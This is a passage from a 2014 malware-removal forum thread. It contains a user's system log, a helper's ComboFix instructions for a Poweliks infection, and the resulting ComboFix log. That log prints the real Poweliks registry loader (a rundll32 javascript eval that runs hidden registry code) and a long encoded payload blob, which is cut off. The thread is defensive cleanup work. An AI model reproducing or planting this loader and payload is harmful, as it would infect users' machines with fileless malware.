Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA-JOURNAL> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES-JOURNAL> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOCK> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOG> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) Error: (08/23/2014 04:23:46 PM) (Source: Windows Search Service) (EventID: 3013) (User: )Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\000002.DBTMP> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f) System errors:=============Error: (08/23/2014 04:23:55 PM) (Source: DCOM) (EventID: 10010) (User: )Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (08/23/2014 04:23:32 PM) (Source: WMPNetworkSvc) (EventID: 14325) (User: )Description: WMPNetworkSvc0x80070424 Error: (08/23/2014 04:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026) Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: AVGIDSDriverAVGIDSShim Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )Description: vToolbarUpdater%%2 Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )Description: AVGIDSAgentAVGIDSDriver%%31 Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )Description: Computer Browser%%1060 Error: (08/23/2014 04:13:21 PM) (Source: Service Control Manager) (EventID: 7030) (User: )Description: PEVSystemStart Error: (08/23/2014 04:09:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )Description: PEVSystemStart Error: (08/23/2014 04:04:22 PM) (Source: Service Control Manager) (EventID: 7030) (User: )Description: PEVSystemStart Microsoft Office Sessions:=========================Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time. This session ended with a crash. Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time. This session ended with a crash. Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time. This session ended with a crash. Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time. This session ended with a crash. CodeIntegrity Errors:=================================== Date: 2014-08-23 16:55:09.878 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:55:09.753 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:55:09.581 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:55:09.441 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:55:09.223 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:55:09.113 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:55:08.989 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:55:08.879 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:54:50.034 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-23 16:54:49.909 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHzPercentage of memory in use: 54%Total physical RAM: 3069.46 MBAvailable physical RAM: 1392.41 MBTotal Pagefile: 6375.2 MBAvailable Pagefile: 4531.66 MBTotal Virtual: 2047.88 MBAvailable Virtual: 1882.66 MB ==================== Drives ================================ Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:223.01 GB) NTFS ==>[Drive with boot components (obtained from BCD)]Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFSDrive f: () (Removable) (Total:14.61 GB) (Free:13.1 GB) FAT32 ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS) ========================================================Disk: 1 (Size: 14.6 GB) (Disk ID: C3072E18)Partition 1: (Active) - (Size=14.6 GB) - (Type=0C) ==================== End Of Log ============================ Link to post Share on other sites More sharing options...
Naathim Posted August 24, 2014 ID:870669 Share Posted August 24, 2014 My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat Before we start please note the following:Analysis and research take some time, also sometimes real life gets in the way, please be patient.Limit your internet access to posting here, some infections just wait to steal typed-in passwords.Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.Paste the logs in your posts, attachments make my work harder and more complicated.Stay with me to the end, the absence of symtoms doesn't mean that your machine is fully operational.Note that we may live in totally different time zones, what may cause some delays between answers.I can't foresee everything, so if anything unexpected happens, please stop and inform me!There are no silly questions. Never be afraid to ask if in doubt!Let's start and enjoy the fight! Rules and policiesWe won't support any piracy. That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.You have got Poweliks infection. Scan with ComboFixThis is a very powerful tool that should be used only if advised by Malware Analyst.Do not run ComboFix on your own!Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.Temporary disable your AntiVirus and AntiSpyware protection - instructions here.If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.Right-click on icon and select Run as Administrator to start the tool.Accept the disclaimer and agree if prompted to install Recovery Console.Do not take any actions while ComboFix goes through your System - it may cause it to stall!This scan may take some time!When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).Include that log in your next reply. If you'll encounter any issues with internet connection after running ComboFix, please visit this link. If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine. Don't forget to re-enable your previously switched-off protection software! Link to post Share on other sites More sharing options...
jjoyner1985 Posted August 24, 2014 Author ID:870716 Share Posted August 24, 2014 Hello, Naat. Here's the Combofix log. I see a reference to the Poweliks infection you mentioned. ComboFix 14-08-21.01 - savas.kyriakidis 08/24/2014 15:26:27.3.2 - x86Running from: F:\ComboFix.exe..((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))...CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.You should verify if current CLSID data is correct: .HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5} <NO NAME> REG_SZ Thumbnail Cache Class Factory for Out of Proc Server AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}.HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32 <NO NAME> REG_EXPAND_SZ %SYSTEMROOT%\system32\thumbcache.dll ThreadingModel REG_SZ Apartment.HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32 <NO NAME> REG_SZ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);})) a REG_SZ #@~^WX4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7 !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crtOYalzJNGA VWC[c:rmMGkWWDR1W:JNKAx^WCNJb&{J*zz{*~Z!8{Rv2ZAO*G9 %obWRbwAX/yFA)/lc&bU9WAkvc!OnAO%O&TOX% s/Erbi)`lc3U\bDKxh+UOvJKDK^+k/Eb*`JCE*'Eka,`,:+XYRAx1GNbxLT=))j;qqc!+D?YMrUov$;WU\n.DTl)w.WsACdvcjOMkUovv9CBl+y}F(:gTlq,;qVNVn8At1hsDqZ48iMwXIqV[!jXFs~-myVTCq,EKPz/Pw;\MoZ429*h?"im .s|j!L 8I*1!.((.ZLBs~t1:oYtp"V^xtd8A4^ssYtp"V^k4}(&HaNVV\(LZa|j!L8IX^V.N&/IU}("q^:lj($VK#D8 ^V(U3{BwI*^!jZ[^d\M#HnjYA1C~34yF4lq*[6Nwf9p9H}lT]MOYIsEJV"Vt:^;}`IX8ssYC gA^&gs(Bk+UoW::jfS`,rls.%[;AKp1Z}Z;i:j:(M#L[!^\8kl$m21s8q9/nilt8`G&VB^}s6VI&"s}AIs4V.UeoIV&r3aSsDPn(g!\TEihj:8Mj%NVV-8b*s8 ^!J3w"1 #D5s6*5xj24VIsm0s%ey.y1q!+rVxq8k0E"M#:C lV]C^;5qF2eZF\tuj/t?TrUXg}qF\1x^H4yIq4VjrJ;I:I 6.}?0;]Mj:mXV#u^ht?TrN;qd(01/epgyJs~qI:aa5H6K\wd}qpdpq*"C`1/Ip1.S2wq[MOf(Moy^z&/ FgXm2Is8U*1[ X!Cg41&]A}q6V\ wT}j!2rHIinoAV5U.a4M"s^kl2\tw8hjf8 l"N_9qe2I\^rTkiV"P1M#Nlqs/::wO}U6(lqIs} VKm mkjCjr8M^L&ka4if^y[MjOS^9sts6Vef"w8 W;5 ok4VVE\!g-4 }s4 I28y*yoPW+j&"48:"t1:}/Bo~t^:wO}oIs^ HwJsgV[2^O1Ma^4q.E9MwTlq,;Is64t2HW&s984x"28`/:oEe 9VtZ&2rHIinoAV}Ujw8M"s1kXA}q}w(:jH}oIG4ypG(0VE9h,M}?&d(V~FI:awezXqC"sp VPCqm/Phj&i X-9Zaqlo9!9wdqbhVjs.T[o9EjuVS}?SViMwXIqV[!jX^X0;jy.TjqFh8!jYtlTI(]a4y*M(MwUmHorj .;[VVY\j6g5l4t j3&kVG^hj![(x;q;IinoAV}Ujw8M"s1kXGms.t9Mji+oAs|;3{Wq}F(h1ZlO;(M9tF$t^hwY(Z48jVszeqFV[!jXFs~-1 sZlq,EhKzdKqs;}VsT829*hjI`mxjsF.ZoqFH!^h^EtFZL9AF-t_./tjX4iMwzIq^NV.Xns~-myVTlq,;K:2/: s!}MwT8&x*h?]j^UjVF.ZL81T^sVEtqZoBs~z( H^}_.X\?0{9w1Xm2Is8`sy1+.D5:XXK.DA1C$28+8tCl[rNw9[o9Xt l!]MOOIs!S0NV92w"my.O5s62toHWnp6olMjzt?8nI:2Vef"GBsR;Iy6-ess/}pgyt8r(CsG5q1W\?zOpq*Vq;IWJ06\I+sZlO;JVgh(Ms!F/xmpZ&2H!apU*s^pjt8CtG&VHlm2IV(?lV4Vhr|o!{Bw.E1+ss}jl4[M^ \jqV[!4\tCt19w1X^2IV8iwy^ jOI:alS0NV9s"XmVjGq0F2e29\1+,sNZlpCWytkX.8Ugtt:j65oI2[s.1tp"W8 ""&kVFms.!9(x;q;I#4 14ts.rIpIaN:jHt("W( ]yJV9V[28sNVt-t;ok]+j!iCx-I!o0}_9V1&tr|U*B4 }-CyjWx!*84MSd}Z44`&sy[!jYJVxq4 I28qjEj l!t(x-1sH^m }wI j"S0t44sIdtj9V\s!KK:jfJjOkm:#L[/~Kn(gT}q!;i .E[!^Yt?lB(x]^ms,h` jzNsV%}oH;jVsE\!6^j:jhFZ4r\(^YP+x;tgTqAV;[wA!^r0/Bsj;1 os}`*t9M^+}`FsNVt-t_HE"+.ZKjTCMO3nZBCtp"18 "q4V.(eq*38!`kF?lB(xt7lyjWxMlq4Vhdp;oVPq,39 6^|?02F?S3`CB\e+j3[(xs|U3{WjYZnp"V F8[&Z]SnjYf( l+}o9T(:W] 9\(i94m `+Hsg!1:sEtzTk#V^+mym.nV,t8p"}e8 (sj.8V("&~Xs,dIsFdC_sk( snjVa* wYj:qw##9V#!9Am8w-8A}\]h46PKx4UVB4?^Vtm3aOlj.pl8Nu82.l(+6VmMXG^.aCIj2?e 4}e8*4qV##2s(]+w|i:w*(sj.2.lU!jfp`s$pooA As( 6l}28V]x4qj:4k]i4qi:gGmy9u6qwcCq41}j^T5j]VKZI&5(4p+GAejjIu6qtl: IVHjj*^s^E:24?t!4We ldp t. V1AP "M^!jV(M]VIAt?IVxX5N96p oA#.Il"q9lV9rjsxkC2L6oaM[:99K_V!t`6f#+w2t.gfq]:.Z6Lj2g6.^wU+b,X[ V;`sqMlX]#:82UV#: hKX[ D!H`9.t`p\[f4*H:O}d!]&j:.n}MTa+s,T.01B[A1pUpIwIj42]sa:\!oa63dhtjg9kv1/n`6(}qghijxu"f4 jvsad&wf}v.2?^tsn`w?\#1VN!A.]9x5joAPfgHCKwo:5*8`65tp^HtMj2:sBsl`62Ug}N_NjIVViZNxtsoWpjw}j ^.ty$;##4I}?OBmw9hiZ6?tU^H M\]"fBxmA.Z\2A+j0q"jqI]8b,?\UVA}:\fp:gfj!]:tu9rtswk?sis}zwjtsgr#mx$x[g4ac*u("6r`va5z9r}`i*"uanimx/\jxD5!}D}P^*HL"}1Ap"#`Iw o4&Jy~egMVSGInts4.5y,pK^9%}^s.9%Vqr2^T\jg99#I}VjA}j^(IZ9/]`sA]f~Aejw$9!o~p`py9L^.`N-pU%X}Zw?\hVVN!A.]j\x"joAjp"H#3^64GV$}ZhDi3OD]f9V:2txHj.C`!w+jNt181f w1guIdp!^"njRcgKBA8f\nCMgdHA}t[GVfjp"*]2^(U2B;I`sA5.z"l:1-I`2-C wh5j/.j&9rJFx:`!]&C 1F#M\j+owt[_Np}#~&CK5+5jo~p`sxt&9/IAs/Hw1t\:tA`pVtIC9}j.j:}.e!j XMHj^epqI9[`65[qw2 M\51347mZIWI!&qp^2.H2NK^Ztwt9HZlVj]jjw/"Z13t#5\#:\9?02tiaizjiz&}j4e\MVSGIx}Mg#}2W*pqIr[`6;1#s~pjw9jV"V5!a;^iwA}jw9KG99[V.r}#~9tyxet2ohm.9wt.4UK8}eHV1#Z*9hwU1:l]Ca5m!sw#s4&]f9%ww- w13}p^ZHCI*`2o~p`ph5j8jpj9aI_tfP;,j\VqX1jw!\K^A`21w\TjsCM\CHomT[AVpjp"1}!gG1jo_4Zq\tFjBp:t5S.As^Z11}39sMX+jx9W5joxtp99}.w$pj} sZ]+9APjw$5(t pjsA5jxp5qN3SZ}4no9f`TNt13^e[25!j2XAiiwA#Kw%+NqaPs%\["4A}j\ed&]Gjq,A`jw$Ko19K;,t[0%cgUq7IVgX^!gK"!t&}jDnC:9op`sB^.3\jfg|j.9G1&B lyt\kOer:VG4yNJHAw9`U}b.:\hex4d`oq}i5\\K"epqI3\`stj!^F}Fg!`sjjqYC`ZOelV1/HA6B[^sSt#sMIjX.]2wI5jon6iIX}O+js3"iqYsjPAcj3xP:CsyKyYcmFw#I0s9I_N$#HYA5Vs~pjO"}!Zc5!t&}jDsj9op`su8Zttj#gF}Fg!jk1W.sYX5DGloWAN29$Cytx}osglMg/\jj5xoK#+^1^:9.l;%fiqYS}ijA}.z-qMo;j`Yfmj96j01]j.}6w5\Uf1n?.^e}j5!jM#A}iwAPK4/pqN\`F1ipgW]f\6jjq"mytL\F95.ZIoKAVp8ZVt:hV8pFg!#kOcj:OX} DWty4]Kqt%}Ns?H+D.} 9-mMVWIZ*.5j9F.01]jqVG}0sW:VWX|FgT]jaZ5:0Fj""|j.\!48IJ6Aw9i#9X}jw$5.#_ljVX9 DG.s6eSZ}e}21f`TNA+2x*^jwM5Ve\HqwDj!wop`s}J8tttTl\\2k*U3sq;,MjFg"p81uI_t$n`}&Uo}I}&KaPj8I1 42\T^SnC9 5ZF]^ytAiiwA}jDoqjH24yo\g!w$I`s$pqs6i2}f`T}o.:I*#:gS9!29 #~s]j"}5^ja}^5\HqwDj!wo5jo5S8t\`:9\pyV!.;%f}`ss5is~pVw]i3wA5V3\HqwDj!wop`s}J8tWtugpCsjinX07rq,AUjw$p`}6.b,*#y,69+YKfw+J&"f`.#AiiwAJ&4#529$Cyt5Cs~A s^("jH~I`sA:j^op`}pKGNBiV/DUit.mjwo}jwMqV4;##wDjj\/4ZsUj`sAi94j3DfU3so4ZNt\!\apo5*.0,J[Zw9qp}2}XRfJ!5!`!HA}iwAPK49Ks}9ijs6HUjX^Kx-5F[_48sl( Xo?09]+ N!6qFwj#sMIXsPVxf`.#.]hxqi3g]}y}f}`sAt%4]!DfU3s\As3j.a-SH%-Sy5aeb,M`T1.pFgu]x9qjKB;##wD]2\9K^99ij..]hw|t3g]q?1W.q,X5DGlV1/H`tt[A.|5VYt+j8(^2gAnyB*eT4x}!9tI_Vue`w2i 9|} ^u:C48mZY9L4 ?AYf?0VtiA3\tPV^l?D tC1X(!ottT5\t2g]KU,*#:AX} DWtXO5d ]hHjst:w(p81(4Z9+eb%\tip7I:w9^3gKUC(X#s9re3gPKqNsn NA}iwA#KwCqMoDNwVt(.\Olj.pKjNu^_Vl(+6Vl:XG^xYIj2? Vx}e8 4qV##81(]f~y :Od":aVl_s1t:wFj^wCqs5jsFwj#N\.!9-[.a\(2tY8!46 394?^9CnwV16p"YC.jp\oD+wVl( X!4ZN4?^94jsFwj#}NNj5.\3wA"24?##x1eLx!l2oA#0Vj]+Xwe&gV"V]_I VVj.\O+GA jq.o]ZV5jV6&jV"jjsa5`Voc\o`!e ZXl^s%tA}p]qxDe 8 ((LS.0sLt!OBw.\?w9jCAIkt!68+f~#e w5`x$}e+"Mjj9*mV.O#ZV5iq"qi:"j"M(SK Vcts4t^N!Hww%tA5y" 685ygijsxV5:4k8il/CjI"l2oA#q,? !4ht28V"3aVjs,L(.\O+GA#N8VpiZV5j36&j:jG#Mj5:3Bc\o4ye39*N^3*tA5c]VWhe 8d((LSGAk(jBV}r?w9 i }k"q.++f~ j8wgOkP "MF!1Xm8wpjAt?tUT6t2"H(LS.`sH(.x"50VG}A9HtA}f"".k}243jsxICH3\hS nf~#j`6Oi 1kj 43]38V"xo;1AFn1VxOlj.pm2oA#2.Dj 2HlL92jf9&5jol8+XM[39PlAF$}`sAP "M^&tz5#M.sFcts1zHsN(?w9rCV*v\Uw++f~pF!\s(j]yP "M[&".?.V6\qFc\o4C}3Xq:so~+`I&5(^\rAV"H^w-PbYH5hoXKf"TF!89tjX;j X3e!g+1q3A\oNA6!8r]3"OUFt;.ZF1(sw6l^Arp8se#`W\to}2}yta[!"q:Msx\"w&]24]r`%-}Nscjp56^2^T"F$xNA.1UM93+V,T1AwB[AV9UpI"?2^T}j9A`ZOA69"2\Odrow3i;,w#Px9C.\p"sIHq,wj.\UK.tHjVt-#`sA5iIHIMOT\399(fohPf\fCKwpIq3A\0Vw\o41]f9%"#xmZFFq(t*}yN}KyV#\o1;j#}wp?RT^sx(j25 3gHiV49Kw}p[Zphjp~s}Vj]gVB;.0.3`W-j^t9IV}e}jAL9#NA}V4$iM"I:!2:#qg|#s9XK^Iiiow&}+Xre3^T::Bxmw.Zjsw3+`IA.`IiiNsZmT1A|!AXnKI!`f]2\qj2C.T"jq3"\q,?H!S*ej"T}.s&?Z}.tjO6j^sGjU%a#sYw}i1tjaXPMaZ5!oA}iwACK"]jqt$}`sA}#~SC.\ (!Tl? sM"kR"row}H^1B8A}}"u}AIf"4jjwA5jo;#ij1C.j my3A# 1w[TwvJ&96":oxmw.pjVA+I0IGH`9.t`p\9fAlrs^}J!gE`jqx\o\y]3jt1yIp} 3XPf"}e?OtjVXjotsU(goKjs6.ss$P0}tU 6053^"jK\vU!a3#+^| s49K^I3]`1w\q\&]f1qt2X0jjA!m:kfr:1#?H%A# NIqicl5!x!nK`!:LsL}VIh]ZRXIs9B[A*kjpg1Cj"+:M]Nm 9fq("!50V"IqN-8A}}UPsVI!\/#s`!tjt]V5\#V9jjU%a wswJTgri:jG`.iXKZ*?\:4]S.s l8.}6j5hU 6V30a]3DM"Z13e#5\#:"/.VV# A!\6 wri:gG`2j..I." Oo.:paI s!];,jT22Nygf^:0hq2swnVgHtV4XKstf}oNA}ixIJyw mF#x?AtA53w$p`}hS8}pi^2\tqtxSywt62Rc:L4A\hO6#!\3S8}%nV}5Cs~A#y"}":]g401Z5jx lUY*j^. P^NtUA~5jw$[!wA5XOA]VwA}j\t+b%atb,3i aq}Vjf2HlI`*A5jw$S2tp?osfCytw} m2H&1.]^I5joAjPwMF!\/.ys/n_9fCi\jJyg#UsIH.tc9F\HKjs"lAIU}`sA`9tql2D"j3^}q2o3]qx5#Lw6.w5atb,3i aq}Vjf2HlIjAA5jw$S2tpposfCytwdT22rKgj]:w }.[c[q\1P.w"lA.$}`sAi94 jD"U3s\H`5\"3xpS2t#r_sfCytWIT1tj:\*\2j\`f]S8sjrnC9 K`F]^ytsiiwA}jjh13B4K^s1`(gG. 5*.s,J^Zw9\p1tS&4p#(w&m 4\\iwc}&^uK_oa6q.(6!lf}3w/j:VM+`p&"sxi.s,TH`1!t_sC"UIXI O+]sa\(2e&]h4YC.jeNqsU]Z*?tp4ICVjtg2T7rjswqftA+GAeNH,J6Aw9\%tq}!Dfj3^}j2o2Hox*}.w$pq3A 0.w##4DCVjemF#xH`}v"3x-?yN]p`sB\`5D"VI&pVjfn2g*"jtA}iwAC.I"KqVe\8sw 9g}C.T"jsIHy1wqfgUljo"4H,*#NtX5 YKKy4%iMafm!BA}igri:\*jjj-6:2dp gm#2"o:2s"`sa5j5-i^ipm01p]z}&5jywrc9$}jw91 ]1jfg|j.0ai01!}^t\hOlJyge}C42.0F1`(gGp N$p`s}J8IWITs5lMxU}jwA5!ar sgX}Fg(?A9#[2tfnij9}jw$5?0l5`pDUMO}lww.p`s$} sZ"+N~Kjw$}?Ryjjsc[q\1P.w"lA1]}`sA]hI\]:wX13H:IZhc"CI"}AtXK^9]Cw2\tq.x+C9 Pj8I1 4ftTwA}j\Cm`Nh6:2\i/OjCMg/tsosrG9c9F\HKjs"lA1f}`sA`9tqI2D"j3^}(!3\^+9p[Cg/jU,eb,Mi ^X}Fgu531~pqNA5jxIb%XHUYHeZ}j"3.t?.wf}jwA"M0hi9t\Jy"dINVK^Zh\no9.^(9.mM0Xpotfj\-p`V$p`s!twm\oN7m(9.Cf\&dX06[pgCJ&4p.osfCyt\\iwc}&^(d ]s+b,MIjgzp81(m0H-6w}/Uf1n?w6ij8I1 L\\qT!J&4p}2sfCyo [q9;#j"o:2s\NA5*"L^s..t;pZI$}^I( ,w5jw$[!wA5:1Z]94A}j"}H^}+6w}Xjfg|j.^+qj0l1:AL(M"-p`sop`sB\NNZ5V.~pjST]Kx&m 4FiiwF}jw3+ AB\0IZ}VwA}j9G"jq~mytwd&`.HjV]?0VrCZss5is~..~KCXOcj!qX} DWty4]K`!-e0tx[TwI}jw$".$2p`s5:SA?0s*HA1rt.tH9f1K.j\3^3gY\Fsy} DWej"fN01Xj;,M#igX}Fg!jFtk^p 5!"SH%.KGtB[0N5(u}Gp3w9]f9Zms]#sa5ejxXNZ1P]oW\\ \\6ZO(dX0X4wwn 4KSH%-Sys$[Zwfmi}I.LwsjVxf`[w#9w1P.w"l;,*#0.6[+DW#.zXt22;jZw?5Fw.5`1XNZ1P]^o :/,WSXR.]C4Z5:1!jf9|j.95?o9$Cyo\no1h^(9.ms#5rw}hU&gF?jV+`%X6:AM"obHN:I-J!wA5!ac^T4x]j\/;%XP0Nj o4ve9Kn!t~4ZY9j:x-Ns.5SH%ztZ.A`is~5jj9[!gK"V^\no9I^3w.lVm*i`! jo5yJXR.m3#~4ZY9q.zTS2m.I`.Uj`sA"V9742^-j3^LI!tj]3jHj.wop`s$]V,rtP1\Jy"d"j2Gp:Nc9XDoH0sop`sHeZ}j"3.t?.wB}jwA"M1AFzR\Jy1Ap`.$}`s#+9Lj&9-mM4NpNAZt:4BmZs.lG}f#s,w:3sn?I*#VgS1!29ijky}VwU?012]Z6p#Tgy}Fg!jF#_l0Vy5DGNU%*jAs$}^I muNtp&^!#XR*\j]c}sx6}j9-pj}+6w}&jfg|j.\C(!4GmZY9j a"mZs.lwjzty1Y9+,KSy^s]C4Z`Vt8 9.^Fw.l;,*#0V6[+DW[(^P2H:I^I9L4 |ZY"?0Vt As3` t`.xI*#L^S1!29eUgL}&9-lwjz8Zst}f^c}Fg!jX1W.0F69 